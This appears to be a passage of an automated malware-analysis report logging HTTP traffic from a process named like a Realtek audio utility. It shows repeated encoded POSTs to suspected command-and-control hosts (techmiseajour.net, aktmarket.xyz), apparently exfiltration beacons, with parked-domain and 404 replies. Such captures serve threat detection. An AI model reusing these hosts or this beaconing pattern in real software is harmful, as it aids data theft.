                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 [TRUNCATED]
                                                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  1192.168.11.304986484.32.84.32805368C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Dec 3, 2024 09:47:56.886923075 CET687OUTPOST /jytl/ HTTP/1.1
                                                                                                  Accept: */*
                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Host: www.techmiseajour.net
                                                                                                  Cache-Control: max-age=0
                                                                                                  Connection: close
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Content-Length: 204
                                                                                                  Origin: http://www.techmiseajour.net
                                                                                                  Referer: http://www.techmiseajour.net/jytl/
                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                  Data Raw: 36 61 6f 6e 6c 35 78 3d 74 34 4a 73 36 2b 37 61 30 47 4c 38 53 59 74 6b 76 79 37 6d 44 68 2b 33 2b 58 30 4f 6f 34 39 55 43 52 78 68 30 66 2b 32 4f 51 49 48 75 74 4a 79 61 75 55 35 55 51 44 61 65 4c 6d 4b 63 6d 43 34 33 49 4c 31 47 71 72 51 55 4d 4f 4e 72 6f 77 55 75 4f 4f 6f 4b 4e 55 65 6e 52 37 6d 50 6d 6f 67 47 31 34 35 45 55 74 6e 49 4b 5a 79 38 50 33 32 79 6a 6e 68 69 4f 51 75 4a 38 7a 79 62 6d 47 76 69 4e 2b 58 62 57 6a 79 46 45 58 44 37 70 4d 68 78 7a 64 30 6a 4b 79 62 5a 6a 30 65 41 61 44 55 6a 58 57 57 38 6f 2b 69 48 76 4a 6a 79 4b 67 55 56 58 4f 31 65 71 6c 51 36 64 30 6d 65 47 59 61 4c 51 3d 3d
                                                                                                  Data Ascii: 6aonl5x=t4Js6+7a0GL8SYtkvy7mDh+3+X0Oo49UCRxh0f+2OQIHutJyauU5UQDaeLmKcmC43IL1GqrQUMONrowUuOOoKNUenR7mPmogG145EUtnIKZy8P32yjnhiOQuJ8zybmGviN+XbWjyFEXD7pMhxzd0jKybZj0eAaDUjXWW8o+iHvJjyKgUVXO1eqlQ6d0meGYaLQ==


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  2192.168.11.304986584.32.84.32805368C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Dec 3, 2024 09:47:59.625017881 CET707OUTPOST /jytl/ HTTP/1.1
                                                                                                  Accept: */*
                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Host: www.techmiseajour.net
                                                                                                  Cache-Control: max-age=0
                                                                                                  Connection: close
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Content-Length: 224
                                                                                                  Origin: http://www.techmiseajour.net
                                                                                                  Referer: http://www.techmiseajour.net/jytl/
                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                  Data Raw: 36 61 6f 6e 6c 35 78 3d 74 34 4a 73 36 2b 37 61 30 47 4c 38 54 34 39 6b 74 52 44 6d 50 52 2b 77 69 48 30 4f 79 49 39 51 43 52 74 68 30 61 65 6d 4f 47 34 48 75 49 31 79 62 76 55 35 5a 77 44 61 57 72 6d 31 42 57 43 7a 33 49 48 4c 47 72 6e 51 55 4d 61 4e 72 70 41 55 75 2f 4f 6e 4c 64 55 63 71 78 37 6b 53 57 6f 67 47 31 34 35 45 58 52 42 49 4b 42 79 38 2f 48 32 7a 47 4c 69 71 75 51 74 4f 38 7a 79 66 6d 47 72 69 4e 2f 34 62 55 58 55 46 48 76 44 37 73 77 68 2f 48 70 33 74 4b 79 64 47 7a 31 43 4a 66 32 62 36 57 75 6a 34 71 4c 2f 50 64 74 6c 33 64 4e 4f 49 55 36 33 4e 4b 5a 39 6d 63 5a 4f 63 45 5a 42 57 53 67 6f 4b 6a 54 30 2f 6f 54 58 72 50 56 43 67 55 69 69 57 6f 77 3d
                                                                                                  Data Ascii: 6aonl5x=t4Js6+7a0GL8T49ktRDmPR+wiH0OyI9QCRth0aemOG4HuI1ybvU5ZwDaWrm1BWCz3IHLGrnQUMaNrpAUu/OnLdUcqx7kSWogG145EXRBIKBy8/H2zGLiquQtO8zyfmGriN/4bUXUFHvD7swh/Hp3tKydGz1CJf2b6Wuj4qL/Pdtl3dNOIU63NKZ9mcZOcEZBWSgoKjT0/oTXrPVCgUiiWow=


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  3192.168.11.304986684.32.84.32805368C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Dec 3, 2024 09:48:02.357923031 CET3824OUTPOST /jytl/ HTTP/1.1
                                                                                                  Accept: */*
                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Host: www.techmiseajour.net
                                                                                                  Cache-Control: max-age=0
                                                                                                  Connection: close
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Content-Length: 3340
                                                                                                  Origin: http://www.techmiseajour.net
                                                                                                  Referer: http://www.techmiseajour.net/jytl/
                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                  Data Raw: 36 61 6f 6e 6c 35 78 3d 74 34 4a 73 36 2b 37 61 30 47 4c 38 54 34 39 6b 74 52 44 6d 50 52 2b 77 69 48 30 4f 79 49 39 51 43 52 74 68 30 61 65 6d 4f 47 77 48 75 36 4e 79 61 49 41 35 59 77 44 61 63 4c 6d 4f 42 57 43 55 33 4c 33 78 47 72 36 72 55 50 69 4e 71 4f 6f 55 6f 4c 36 6e 42 64 55 63 6a 52 37 6c 50 6d 70 30 47 32 42 79 45 55 35 42 49 4b 42 79 38 39 76 32 69 54 6e 69 73 75 51 75 4a 38 7a 75 62 6d 47 54 69 4e 6e 43 62 58 37 69 46 46 2f 44 36 66 34 68 2f 30 42 33 74 4b 79 64 50 54 31 50 4a 66 79 47 36 57 33 71 34 6f 36 45 50 74 4a 6c 32 59 73 36 63 6e 47 7a 65 37 70 55 36 74 74 6b 59 46 64 7a 63 78 77 56 43 77 33 74 70 71 37 32 6a 5a 42 65 78 6e 7a 6b 4a 64 45 44 53 32 7a 62 78 44 51 66 73 30 4d 4c 56 5a 30 63 6f 78 57 70 73 33 72 79 52 31 47 78 74 6d 34 62 32 50 4d 4c 38 30 6c 4d 45 53 73 44 71 50 44 6c 62 41 52 56 33 79 6c 71 73 41 69 2b 50 49 7a 50 63 6e 46 4d 66 61 6b 6a 71 37 2b 6c 34 75 35 43 2b 59 47 30 63 54 34 67 30 4f 63 4a 39 59 73 2f 62 74 7a 4c 43 32 78 39 42 41 4d 77 59 6a 56 4b 5a 61 [TRUNCATED]
                                                                                                  Data Ascii: 6aonl5x=t4Js6+7a0GL8T49ktRDmPR+wiH0OyI9QCRth0aemOGwHu6NyaIA5YwDacLmOBWCU3L3xGr6rUPiNqOoUoL6nBdUcjR7lPmp0G2ByEU5BIKBy89v2iTnisuQuJ8zubmGTiNnCbX7iFF/D6f4h/0B3tKydPT1PJfyG6W3q4o6EPtJl2Ys6cnGze7pU6ttkYFdzcxwVCw3tpq72jZBexnzkJdEDS2zbxDQfs0MLVZ0coxWps3ryR1Gxtm4b2PML80lMESsDqPDlbARV3ylqsAi+PIzPcnFMfakjq7+l4u5C+YG0cT4g0OcJ9Ys/btzLC2x9BAMwYjVKZaZxQPHmPmYLInfAmYvjfSXJ8iOC0PP8A0bULw0ccOT4kdct+xdWH+CQQg+TYzacmC0gNxlyK2G8hR7i4umeCClCTaM/nVNEDs3CQ/c25r0x/9j7Xn6w+W5jOe5sOZXA2INf5l5ftsuoD8vUVLcbQG8QcE8fgK2765XFYhQHS2oWLTUVtFQtLy5ZIk19o6pIACMvaUYyAhIy/fa0VM+D+fOeWP7mOrbKR1bKLfbq7/bRY93ul+AdGYdtdeU8lYfCdzj0LvpjtavNHHOi0Zf6TggvjGwfG92Sa/6BZNaT4iWldHq21LkBOH68PnRjx/qPBiczDtE52pX7Mr+JwcMgp1PCsTHbgFrWvH04W15eIvCuzy49yzbT1TKF20/kffbTpxMxhUUfKryE33o1LiJWiq0kYQnX6XuMaOuxmehpFnPNQnxMvmeDnZHo+abnnpkrfQM0MnSo6cjgNck+hmAn+YqSqH43VW5POZ6Tq3PrjcUOji3OLlnx/T16t7R32TyuMugb4Ub7sEbG04DrEBTkmy3Y7H31Qg6tiJtRGvVevGz/VZ6bY/LT/Vvw/9QksXnW5y9IaSkiokMY1VZMjhUSZWvBSig+g0cCFDcJM7ZkNHWuWpqW1lzHvMInPeOwYbnezpuTERvQvdu8+PCJO5gnR2LLH3lxNOvnbnc1 [TRUNCATED]


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  4192.168.11.304986784.32.84.32805368C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Dec 3, 2024 09:48:05.090152979 CET418OUTGET /jytl/?6aonl5x=g6hM5OfAy0aZTOdzzizqGwSFwxhc1L9nbH1D7PSRWxwlxqBVZ/VTfBjjReyEGXu+lurHf7fRU8SuqLFFtve4Dt4YiF/6MWt/ODdeGnRIPeEv+Y3Y8H3JjIc=&wYHk=M_B-ghc2HqoWhmeC HTTP/1.1
                                                                                                  Accept: */*
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Host: www.techmiseajour.net
                                                                                                  Connection: close
                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                  Dec 3, 2024 09:48:05.301582098 CET1289INHTTP/1.1 200 OK
                                                                                                  Date: Tue, 03 Dec 2024 08:48:05 GMT
                                                                                                  Content-Type: text/html
                                                                                                  Content-Length: 9973
                                                                                                  Connection: close
                                                                                                  Vary: Accept-Encoding
                                                                                                  Server: hcdn
                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                  x-hcdn-request-id: 521ada5260a096c55bce7131b5a9a7d0-asc-edge6
                                                                                                  Expires: Tue, 03 Dec 2024 08:48:04 GMT
                                                                                                  Cache-Control: no-cache
                                                                                                  Accept-Ranges: bytes
                                                                                                  Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 22 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f [TRUNCATED]
                                                                                                  Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"Open Sans",Helvetica,sans-serif;color:#000;padding:0;m
                                                                                                  Dec 3, 2024 09:48:05.301594019 CET1289INData Raw: 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 32 38 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 30 2e 37 64 65 67 2c 23 65 39 65 64 66 62 20 2d 35 30 2e 32 31 25 2c 23 66 36 66 38
                                                                                                  Data Ascii: argin:0;line-height:1.428;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:30px;font-weight:600!important;color:#333}h2{font-size:24px;font-weight:60
                                                                                                  Dec 3, 2024 09:48:05.301603079 CET1289INData Raw: 65 61 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 2d 6e 61 76 3e 6c 69 3e 61 20 69 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 35 70 78 7d 2e 6e 61 76 2d 62 61 72 20 69 6d 67 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 74 6f
                                                                                                  Data Ascii: ea!important}.navbar-nav>li>a i{margin-right:5px}.nav-bar img{position:relative;top:3px}.congratz{margin:0 auto;text-align:center}.top-container{display:flex;flex-direction:row}.message-subtitle{color:#2f1c6a;font-weight:700;font-size:24px;lin
                                                                                                  Dec 3, 2024 09:48:05.301729918 CET1289INData Raw: 7a 65 3a 31 32 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 36 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 32 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 32 30 70 78 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 3b 74 65 78 74
                                                                                                  Data Ascii: ze:12px;line-height:16px;min-height:20px;min-width:20px;vertical-align:middle;text-align:center;display:inline-block;padding:4px 8px;font-weight:700;border-radius:4px;background-color:#fc5185}@media screen and (max-width:768px){.message{width:
                                                                                                  Dec 3, 2024 09:48:05.301740885 CET1289INData Raw: 2d 67 72 61 64 75 61 74 69 6f 6e 2d 63 61 70 22 3e 3c 2f 69 3e 20 54 75 74 6f 72 69 61 6c 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 68 6f 73 74 69 6e 67 65 72 2e 63 6f 6d 2f
                                                                                                  Data Ascii: -graduation-cap"></i> Tutorials</a></li><li><a href=https://support.hostinger.com/en/ rel=nofollow><i aria-hidden=true class="fa-readme fab"></i>Knowledge base</a></li><li><a href=https://www.hostinger.com/affiliates rel=nofollow><i aria-hidde
                                                                                                  Dec 3, 2024 09:48:05.301749945 CET1289INData Raw: 46 69 6e 64 20 79 6f 75 72 20 68 6f 73 74 69 6e 67 20 70 6c 61 6e 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 78 73 2d 31 32 20 63 6f 6c 2d 73 6d 2d 34 20 63 6f 6c 75 6d 6e 2d 63 75 73 74 6f 6d
                                                                                                  Data Ascii: Find your hosting plan</a></div></div><div class="col-xs-12 col-sm-4 column-custom-wrap"><div class=column-custom><div class=column-title>Add website to your hosting</div><br><p>Add your website to any of your hosting plans. Follow the article
                                                                                                  Dec 3, 2024 09:48:05.301820040 CET1289INData Raw: 54 46 2d 31 36 20 76 61 6c 75 65 22 29 3b 36 35 35 33 35 3c 72 26 26 28 72 2d 3d 36 35 35 33 36 2c 65 2e 70 75 73 68 28 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 72 3e 3e 3e 31 30 26 31 30 32 33 7c 35 35 32 39 36 29 29 2c 72 3d
                                                                                                  Data Ascii: TF-16 value");65535<r&&(r-=65536,e.push(String.fromCharCode(r>>>10&1023|55296)),r=56320|1023&r),e.push(String.fromCharCode(r))}return e.join("")}};var o=36,r=2147483647;function e(o,r){return o+22+75*(o<26)-((0!=r)<<5)}function n(r,e,n){var t;
                                                                                                  Dec 3, 2024 09:48:05.301898956 CET1289INData Raw: 68 61 72 43 6f 64 65 41 74 28 30 29 29 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 75 74 66 31 36 2e 65 6e 63 6f 64 65 28 6d 29 7d 2c 74 68 69 73 2e 65 6e 63 6f 64 65 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 61 29 7b 76 61 72 20 68 2c 66 2c 69 2c 63 2c 75
                                                                                                  Data Ascii: harCodeAt(0));return this.utf16.encode(m)},this.encode=function(t,a){var h,f,i,c,u,d,l,p,g,s,C,w;a&&(w=this.utf16.decode(t));var v=(t=this.utf16.decode(t.toLowerCase())).length;if(a)for(d=0;d<v;d++)w[d]=t[d]!=w[d];var m,y=[];for(h=128,u=72,d=f


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  5192.168.11.304986813.248.169.48805368C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Dec 3, 2024 09:48:10.616728067 CET675OUTPOST /wb7v/ HTTP/1.1
                                                                                                  Accept: */*
                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Host: www.aktmarket.xyz
                                                                                                  Cache-Control: max-age=0
                                                                                                  Connection: close
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Content-Length: 204
                                                                                                  Origin: http://www.aktmarket.xyz
                                                                                                  Referer: http://www.aktmarket.xyz/wb7v/
                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                  Data Raw: 36 61 6f 6e 6c 35 78 3d 46 43 63 36 45 31 36 6c 7a 32 4c 51 39 7a 73 4f 2b 62 6d 4f 55 43 6d 73 6e 58 75 67 55 31 2f 77 58 48 36 61 55 45 66 63 34 36 68 45 44 74 52 2f 57 54 4a 58 51 30 56 57 57 63 59 56 75 57 58 63 33 71 6b 4a 33 4c 72 59 44 6f 47 4a 79 79 4d 31 65 68 6f 54 48 4d 46 50 58 75 39 5a 31 73 37 65 46 54 55 64 6f 32 2f 34 30 7a 46 6f 67 66 66 4a 72 66 6f 6d 74 68 74 51 68 37 35 48 76 63 6f 6d 4b 58 6d 34 68 39 65 55 54 2b 66 6d 55 55 31 75 4d 66 71 6a 51 42 38 4f 35 6a 77 71 44 68 72 33 6f 74 32 33 41 55 46 45 47 52 56 78 51 4c 37 77 66 4a 65 57 44 35 4a 50 73 47 33 53 32 67 71 59 64 77 3d 3d
                                                                                                  Data Ascii: 6aonl5x=FCc6E16lz2LQ9zsO+bmOUCmsnXugU1/wXH6aUEfc46hEDtR/WTJXQ0VWWcYVuWXc3qkJ3LrYDoGJyyM1ehoTHMFPXu9Z1s7eFTUdo2/40zFogffJrfomthtQh75HvcomKXm4h9eUT+fmUU1uMfqjQB8O5jwqDhr3ot23AUFEGRVxQL7wfJeWD5JPsG3S2gqYdw==


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  6192.168.11.304986913.248.169.48805368C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Dec 3, 2024 09:48:13.253774881 CET695OUTPOST /wb7v/ HTTP/1.1
                                                                                                  Accept: */*
                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Host: www.aktmarket.xyz
                                                                                                  Cache-Control: max-age=0
                                                                                                  Connection: close
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Content-Length: 224
                                                                                                  Origin: http://www.aktmarket.xyz
                                                                                                  Referer: http://www.aktmarket.xyz/wb7v/
                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                  Data Raw: 36 61 6f 6e 6c 35 78 3d 46 43 63 36 45 31 36 6c 7a 32 4c 51 38 53 63 4f 6c 34 4f 4f 46 53 6d 72 37 6e 75 67 47 31 2f 30 58 48 6d 61 55 41 75 48 34 73 52 45 44 4e 68 2f 59 79 4a 58 41 6b 56 57 4f 4d 59 4d 6b 32 58 62 33 71 70 30 33 4b 58 59 44 6f 43 4a 79 79 38 31 65 51 6f 51 57 4d 46 4a 43 65 39 62 74 4d 37 65 46 54 55 64 6f 32 37 65 30 7a 64 6f 68 76 76 4a 72 2b 6f 70 67 42 73 69 32 4c 35 48 2b 4d 6f 69 4b 58 6e 43 68 38 53 79 54 39 33 6d 55 51 6c 75 4d 75 71 6b 62 42 38 49 39 6a 78 6e 4d 45 53 7a 78 73 2b 6f 54 7a 70 4b 4a 43 56 47 63 38 57 71 43 4b 71 55 51 5a 31 69 77 48 61 36 30 69 72 44 41 78 6b 63 45 59 71 38 32 32 56 70 4d 36 73 36 48 74 62 76 52 2b 55 3d
                                                                                                  Data Ascii: 6aonl5x=FCc6E16lz2LQ8ScOl4OOFSmr7nugG1/0XHmaUAuH4sREDNh/YyJXAkVWOMYMk2Xb3qp03KXYDoCJyy81eQoQWMFJCe9btM7eFTUdo27e0zdohvvJr+opgBsi2L5H+MoiKXnCh8SyT93mUQluMuqkbB8I9jxnMESzxs+oTzpKJCVGc8WqCKqUQZ1iwHa60irDAxkcEYq822VpM6s6HtbvR+U=


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  7192.168.11.304987113.248.169.48805368C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Dec 3, 2024 09:48:15.897372961 CET1289OUTPOST /wb7v/ HTTP/1.1
                                                                                                  Accept: */*
                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Host: www.aktmarket.xyz
                                                                                                  Cache-Control: max-age=0
                                                                                                  Connection: close
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Content-Length: 3340
                                                                                                  Origin: http://www.aktmarket.xyz
                                                                                                  Referer: http://www.aktmarket.xyz/wb7v/
                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                  Data Raw: 36 61 6f 6e 6c 35 78 3d 46 43 63 36 45 31 36 6c 7a 32 4c 51 38 53 63 4f 6c 34 4f 4f 46 53 6d 72 37 6e 75 67 47 31 2f 30 58 48 6d 61 55 41 75 48 34 76 78 45 43 2b 70 2f 58 78 68 58 44 6b 56 57 48 73 59 4a 6b 32 58 47 33 71 78 77 33 4b 61 74 44 72 71 4a 6a 67 30 31 59 6a 77 51 50 63 46 4a 64 4f 39 59 31 73 37 50 46 54 6b 52 6f 32 4c 65 30 7a 64 6f 68 73 33 4a 73 76 6f 70 69 42 74 51 68 37 35 39 76 63 6f 61 4b 58 65 67 68 38 57 45 54 2b 58 6d 55 6d 39 75 4d 38 53 6b 62 42 38 49 77 44 78 69 4d 45 57 79 78 73 6d 38 54 33 31 61 4f 78 5a 47 4b 59 66 72 65 4f 2b 39 44 66 35 6f 39 33 75 37 6a 53 76 54 43 43 55 71 4a 35 58 43 36 43 52 32 49 75 5a 75 54 64 2b 70 53 37 6b 4a 4f 62 4e 52 7a 53 63 35 37 69 61 6c 6c 72 4c 2b 78 41 32 42 2f 37 64 75 6f 75 75 56 2f 76 31 35 39 59 75 41 7a 68 4c 35 74 31 63 58 72 56 41 49 66 4a 2b 62 73 45 4b 6d 46 75 34 73 53 49 4c 63 4a 32 79 54 79 73 38 7a 56 54 6d 41 46 44 47 41 68 62 79 39 70 62 77 31 5a 55 45 45 67 6e 64 4a 6d 78 63 38 54 42 67 61 39 53 36 55 34 74 49 6a 61 58 [TRUNCATED]
                                                                                                  Data Ascii: 6aonl5x=FCc6E16lz2LQ8ScOl4OOFSmr7nugG1/0XHmaUAuH4vxEC+p/XxhXDkVWHsYJk2XG3qxw3KatDrqJjg01YjwQPcFJdO9Y1s7PFTkRo2Le0zdohs3JsvopiBtQh759vcoaKXegh8WET+XmUm9uM8SkbB8IwDxiMEWyxsm8T31aOxZGKYfreO+9Df5o93u7jSvTCCUqJ5XC6CR2IuZuTd+pS7kJObNRzSc57iallrL+xA2B/7duouuV/v159YuAzhL5t1cXrVAIfJ+bsEKmFu4sSILcJ2yTys8zVTmAFDGAhby9pbw1ZUEEgndJmxc8TBga9S6U4tIjaXoMaqTVranpNOUoZb0hf6V1ExWYtogK+vNNdtTJ0blcaufM7rpzXB1Cu2l9WCjuR3oLNC6yF9QnrVxR5PQyssiQ4lJNKrBOJfuKzlN83Pm5mSO4Lp65cld4+99ClfjEoforrohWEiWa4Cz7sNFGVnfKsOUOJghs36Sh5NFYD8336VPjvGJEUvr5O/hb06Yiqhru+L2KgS+P96M9h5qPN5kT+yYusF7bRAJfBhfIheybRHf3SdWGFc3tRF4N7Jc/1Ue5Gw0YoDrxFJqjpJ3Xzpw0anpEE3rem2rDE/dJiXHlmFMo36+V2XfKTbcTuXb3XfUQPqdy5C5RiwsBOUp1a97VWiYgC4frSp0SX5JLpUqQkw6ri0+eQI8tyzaxFMF57RG0e6wTFzw8vCtpYujDg0P0k7zHYxozCrEf1E7HhjfNZIHboQJYsoZggcgn+Fd0oYrFQkOfsA4JBbARbM7PFd4pcpVtDXD50
